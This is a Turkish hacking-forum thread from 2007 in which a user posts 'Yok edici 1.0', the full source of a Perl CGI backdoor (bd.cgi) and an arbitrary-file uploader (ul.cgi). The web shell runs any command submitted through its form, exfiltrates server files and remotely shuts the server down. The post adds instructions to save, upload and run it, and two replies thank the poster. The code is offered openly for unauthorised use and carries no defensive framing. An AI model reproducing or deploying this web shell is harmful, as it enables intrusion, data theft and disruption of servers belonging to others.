www.cakal.net Forumları YabadabaDuuuee  

Geri Git   www.cakal.net Forumları YabadabaDuuuee > Forum > Eskiler (Arşiv)

Eskiler (Arşiv) Eski konular

CevaplaCevapla
 
Konu Araçları Görünüm Modları
Old 06-12-2007, 12:13 AM   #1
Tilki_Andre
Forum Aşığı
 
Tilki_Andre Kullanıcısının Avatarı
 
Üyelik Tarihi: Feb 2007
Konum: ¢αкαℓ.ηєттєη
Yaş: 31
Mesajlar: 4,929
Teşekkür Etme: 235
Thanked 266 Times in 182 Posts
Üye No: 31562
İtibar Gücü: 2445
Rep Puanı : 11542
Rep Derecesi : Tilki_Andre has a reputation beyond reputeTilki_Andre has a reputation beyond reputeTilki_Andre has a reputation beyond reputeTilki_Andre has a reputation beyond reputeTilki_Andre has a reputation beyond reputeTilki_Andre has a reputation beyond reputeTilki_Andre has a reputation beyond reputeTilki_Andre has a reputation beyond reputeTilki_Andre has a reputation beyond reputeTilki_Andre has a reputation beyond reputeTilki_Andre has a reputation beyond repute
Cinsiyet : Erkek
Wink Yok edici 1.0

Bu Birazdan Verecegim Kodlar Perl / CGI Scriptidir. Server Yanlis Kuruldugunda Bu Bug Meydana Cikar Ve Göreceksiniz Cok Tehlikeli Bir Bugdur.

Bug Sayesinde Servere ROOT Olarak Baglanabilir Ve Hemen Hemen Tüm ROOT Yetkilerine Sahip Olabilirsiniz. Servere Download Upload Yapabilir Hatta Isterseniz Serveri Tamamen Kapatabilirsiniz ))

Kodlar1:

#YOKEDICI 1.0 - CGI Backdoor

#Variablen (Bunu Degistirmeyin)

$name = "bd.cgi"; #Scriptin Ismi
$uploadname = "ul.cgi"; #Upload Scriptinin Ismi
$rootfolder = "../root/";
$pos = "c:\\httpd\\cgi-bin\\"; #Scriptlerin Pathi

#Code (Bunu Degistirmeyin)

&parse_form;

if ($in{art} eq "") {

print "Content-Type: text/html\n\n";
print "<html><head><title>Commands</title></head>";
print "<body><font size=\"2\" face=\"Verdana, Arial\">";
print "<form action=\"$name\" method=\"POST\">";
print "<INPUT NAME=\"art\" TYPE=\"RADIO\" ALIGN=left VALUE=\"1\">1: Dosya Indir: Path: <input name=\"filepfad\" type=\"text\" value=\"c:\\WINNT\\\"> Dosya Ismi: <input name=\"filename\" type=\"text\" value=\"explorer.exe\">";
print "<br><INPUT NAME=\"art\" TYPE=\"RADIO\" ALIGN=left VALUE=\"2\">2: Dosya Upload";
print "<br><INPUT NAME=\"art\" TYPE=\"RADIO\" ALIGN=left VALUE=\"3\">3: DOS Komutlari: <input name=\"cmd\" type=\"text\" value=\"dir \\\">";
print "<br><INPUT NAME=\"art\" TYPE=\"RADIO\" ALIGN=left VALUE=\"4\">4: Serveri Kapat";
print "<br><br><INPUT TYPE=\"SUBMIT\" VALUE=\"Yolla\">";
print "</form></font></body></html>";

}

elsif ($in{art} eq "1") {

$pfad = "$in{filepfad}$in{filename}";
open(DATEI, $pfad);
@inhalt=<DATEI>;
close(DATEI);

$pfad = "$rootfolder$in{filename}";

open(DATEI, ">$pfad");
foreach $zeile (@inhalt) {
print DATEI "$zeile\n";
}

print "Content-Type: text/html\n\n";
print "<html><head><title>Dosya Indir</title></head>";
print "<body><font size=\"2\" face=\"Verdana, Arial\">";
print "Bu $in{filename} Dosyayi <a href=\"../$in{filename}\">Burdan</a> Indirebilirsin.";
print "</font></form></body></html>";
}

elsif ($in{art} eq "2") {

print "Content-Type: text/html\n\n";
print "<html><head><title>Dosya Sec</title></head><body>Dosya Sec:<br>";
print "<form name=\"Upload\" action=\"$uploadname\" method=\"POST\" enctype=\"multipart/form-data\"> <input type=\"file\" name=\"Dosya\" size=\"30\"> <input type=\"submit\" value=\"Upload Et\"> </form>";
print "</body></html>";

}

elsif ($in{art} eq "3") {
print "Content-Type: text/html\n\n";
print "<html><head><title>DOS</title></head><body><pre>";
system ("$in{cmd}");
print "</pre></body></html>";
}

elsif ($in{art} eq "4") {
print "Content-Type: text/html\n\n";
system ("c:\\winnt\\system32\\rundll32.exe shell32,SHExitWindowsEx 2");
}

sub parse_form {

local ($buffer, @pairs, $pair, $name, $value);
# Read in text
$ENV{REQUEST_METHOD} =~ tr/a-z/A-Z/;
if ($ENV{REQUEST_METHOD} eq "POST")
{
read(STDIN, $buffer, $ENV{CONTENT_LENGTH});
}
else
{
$buffer = $ENV{QUERY_STRING};
}
@pairs = split(/&/, $buffer);
foreach $pair (@pairs)
{
($name, $value) = split(/=/, $pair);
$value =~ tr/+/ /;
$value =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$in{$name} = $value;
}
}

Evet Arkadaslar Bu Kodlari Text Editore Yaziyoruz Ve bd.cgi Olarak Kayit Ediyoruz. Yalniz Yukarida Belirtilen Pathleri Servere Göre Degistirmeniz Gerekecek.

Kodlar2:

#!/usr/bin/perl

binmode STDIN;
read STDIN, $Daten, $ENV{CONTENT_LENGTH};

@Teile = split /-----------------------------.{9}/, $Daten;
@Datei = split /\n/, $Teile[1], 5;
while ($Datei[1] =~ /\\/) { $Datei[1] =~ s/^.*\\//; }
$Datei[1] =~ s/"//;
chop $Datei[1];
chop $Datei[4]; chop $Datei[4];

open DATEI, ">$Datei[1]";
binmode DATEI;
print DATEI $Datei[4];
close DATEI;

print "Content-type: text/html\n\nUpload Basarili!";

Bu Kodda Hicbirsey Degistirmenize Gerek Yok. Bunuda Text Editore Yazip Ismini ul.cgi Olarak Kayit Ediyoruz. Evet Arkadaslar YOKEDICImiz Hazir )))

Simdi Bu Dosyalari Yüklüyoruz Ve Adres Barda bd.cgiyi Calistiriyoruz...
Selametle...
__________________
:wink:
Tilki_Andre çevrimdışı   Alıntı ile Cevapla
Eski Bugün   #n/a 
Teşekkür Botu
Bot
bot Çevrimiçi

Avatar

Giriş Tarihi: Ocak 2005
Yaş: 0
Mesaj : 0
Üye No: 0
Rep Power: Çok
qarizma (06-29-2007) bu konu için teşekkür ettiler...
bot Çevrimiçi Tesekkur botuna Rep veremezsiniz. Yinede Tesekkurler. Kurallara Aykırı Mesajı Bildir  
Old 06-25-2007, 08:04 PM   #2
TiTaN
ÇaKaL Üye
 
Üyelik Tarihi: Jun 2007
Konum: Houston
Mesajlar: 1,880
Teşekkür Etme: 32
Thanked 29 Times in 24 Posts
Üye No: 43307
İtibar Gücü: 1768
Rep Puanı : 7482
Rep Derecesi : TiTaN has a reputation beyond reputeTiTaN has a reputation beyond reputeTiTaN has a reputation beyond reputeTiTaN has a reputation beyond reputeTiTaN has a reputation beyond reputeTiTaN has a reputation beyond reputeTiTaN has a reputation beyond reputeTiTaN has a reputation beyond reputeTiTaN has a reputation beyond reputeTiTaN has a reputation beyond reputeTiTaN has a reputation beyond repute
Cinsiyet : Erkek
Varsayılan

çok saol arkadaş süper bişimiş...
__________________
I walk this empty street on the boulevard of broken dreams where the city sleeps and I'm the only one and I walk alone!!
TiTaN çevrimdışı   Alıntı ile Cevapla
Old 06-29-2007, 02:55 PM   #3
qarizma
Daimi Üye
 
Üyelik Tarihi: Sep 2006
Mesajlar: 917
Teşekkür Etme: 648
Thanked 71 Times in 36 Posts
Üye No: 18465
İtibar Gücü: 1602
Rep Puanı : 4494
Rep Derecesi : qarizma has a reputation beyond reputeqarizma has a reputation beyond reputeqarizma has a reputation beyond reputeqarizma has a reputation beyond reputeqarizma has a reputation beyond reputeqarizma has a reputation beyond reputeqarizma has a reputation beyond reputeqarizma has a reputation beyond reputeqarizma has a reputation beyond reputeqarizma has a reputation beyond reputeqarizma has a reputation beyond repute
Cinsiyet : Erkek
Varsayılan

Sen denedin yada kulandınmı ?
__________________
.
qarizma çevrimdışı   Alıntı ile Cevapla
CevaplaCevapla


Konuyu Görüntüleyen Aktif Kullanıcılar: 1 (0 üye ve 1 misafir)
 

Yayınlama Kuralları
Yeni konu açamazsınız
Cevap gönderemezsiniz
Eklenti ekleyemezsiniz
Mesajlarınızı düzenleyemezsiniz

Kodlama is Açık
Smilies are Açık
[IMG] code is Açık
HTML code is Kapalı


Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
kadin zevkten inliyor bol sesli tahrik edici adultcuk Türk Video 0 02-27-2010 03:55 AM
kadin zevkten inliyor bol sesli tahrik edici adultcuk Türk Video 0 02-21-2010 03:16 AM
kadin zevkten inliyor bol sesli tahrik edici adultcuk Türk Video 0 02-20-2010 11:17 PM
Biranın şok edici özelliği DHeMLy-CHaY Eskiler (Arşiv) 4 12-06-2006 05:32 PM
Tutsak edici güzellik CaKaLBoT Eskiler (Arşiv) 0 10-10-2006 09:53 PM

Forum saati GMT +3 olarak ayarlanmıştır. Şu an saat: 03:48 AM

Yazılım: vBulletin® - Sürüm: 3.8.11   Copyright ©2000 - 2025, vBulletin Solutions, Inc.